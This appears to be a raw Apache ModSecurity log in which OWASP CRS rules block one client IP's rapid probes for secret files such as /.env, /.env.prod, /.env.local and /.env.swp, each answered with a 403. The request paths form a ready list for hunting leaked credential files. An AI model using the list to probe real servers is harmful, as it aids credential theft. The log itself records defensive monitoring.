[Mon May 11 20:55:47.340522 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImM_jVc-A-CSptvm1xDQAAAEs"]
[Mon May 11 20:55:47.340807 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImM_jVc-A-CSptvm1xDQAAAEs"]
[Mon May 11 20:55:47.350905 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImM1NddpkriGUb6ZV2SgAAARE"]
[Mon May 11 20:55:47.351066 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImM1NddpkriGUb6ZV2SgAAARE"]
[Mon May 11 20:55:47.351474 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImM1NddpkriGUb6ZV2SgAAARE"]
[Mon May 11 20:55:47.367417 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImMyMeXtzav-mi9SyxHAAAAM8"]
[Mon May 11 20:55:47.367665 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImMyMeXtzav-mi9SyxHAAAAM8"]
[Mon May 11 20:55:47.367926 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImMyMeXtzav-mi9SyxHAAAAM8"]
[Mon May 11 20:55:47.368398 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImMzP5Q_-MBliRCAxmzgAAABI"]
[Mon May 11 20:55:47.368560 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImMzP5Q_-MBliRCAxmzgAAABI"]
[Mon May 11 20:55:47.368756 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImMzP5Q_-MBliRCAxmzgAAABI"]
[Mon May 11 20:55:47.369146 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImM5Yn-x0CHsbEbP2tCgAAAIQ"]
[Mon May 11 20:55:47.369435 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImM5Yn-x0CHsbEbP2tCgAAAIQ"]
[Mon May 11 20:55:47.369730 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImM5Yn-x0CHsbEbP2tCgAAAIQ"]
[Mon May 11 20:55:47.370993 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.int"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImM9eaRXe5lR8y0ZOSrQAAAUI"]
[Mon May 11 20:55:47.371146 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImM9eaRXe5lR8y0ZOSrQAAAUI"]
[Mon May 11 20:55:47.371342 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImM9eaRXe5lR8y0ZOSrQAAAUI"]
[Mon May 11 20:55:47.373375 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImM1NddpkriGUb6ZV2SwAAARE"]
[Mon May 11 20:55:47.373525 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImM1NddpkriGUb6ZV2SwAAARE"]
[Mon May 11 20:55:47.373698 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImM1NddpkriGUb6ZV2SwAAARE"]
[Mon May 11 20:55:47.387600 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImMyMeXtzav-mi9SyxHQAAAM8"]
[Mon May 11 20:55:47.387837 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImMyMeXtzav-mi9SyxHQAAAM8"]
[Mon May 11 20:55:47.388090 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImMyMeXtzav-mi9SyxHQAAAM8"]
[Mon May 11 20:55:47.390829 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImM5Yn-x0CHsbEbP2tCwAAAIQ"]
[Mon May 11 20:55:47.391100 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImM5Yn-x0CHsbEbP2tCwAAAIQ"]
[Mon May 11 20:55:47.391439 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImM5Yn-x0CHsbEbP2tCwAAAIQ"]
[Mon May 11 20:55:47.391894 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImM1NddpkriGUb6ZV2TAAAAQw"]
[Mon May 11 20:55:47.392042 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImM1NddpkriGUb6ZV2TAAAAQw"]
[Mon May 11 20:55:47.392250 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImM1NddpkriGUb6ZV2TAAAAQw"]
[Mon May 11 20:55:47.394850 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImM1NddpkriGUb6ZV2TQAAARE"]
[Mon May 11 20:55:47.394993 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImM1NddpkriGUb6ZV2TQAAARE"]
[Mon May 11 20:55:47.395178 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImM1NddpkriGUb6ZV2TQAAARE"]
[Mon May 11 20:55:47.412439 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImM5Yn-x0CHsbEbP2tDAAAAIQ"]
[Mon May 11 20:55:47.412787 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImM5Yn-x0CHsbEbP2tDAAAAIQ"]
[Mon May 11 20:55:47.413151 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImM5Yn-x0CHsbEbP2tDAAAAIQ"]
[Mon May 11 20:55:47.416463 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImMzP5Q_-MBliRCAxmzwAAAAo"]
[Mon May 11 20:55:47.416747 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImMzP5Q_-MBliRCAxmzwAAAAo"]
[Mon May 11 20:55:47.417055 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImMzP5Q_-MBliRCAxmzwAAAAo"]
[Mon May 11 20:55:47.433797 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImM5Yn-x0CHsbEbP2tDQAAAIQ"]
[Mon May 11 20:55:47.434126 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImM5Yn-x0CHsbEbP2tDQAAAIQ"]
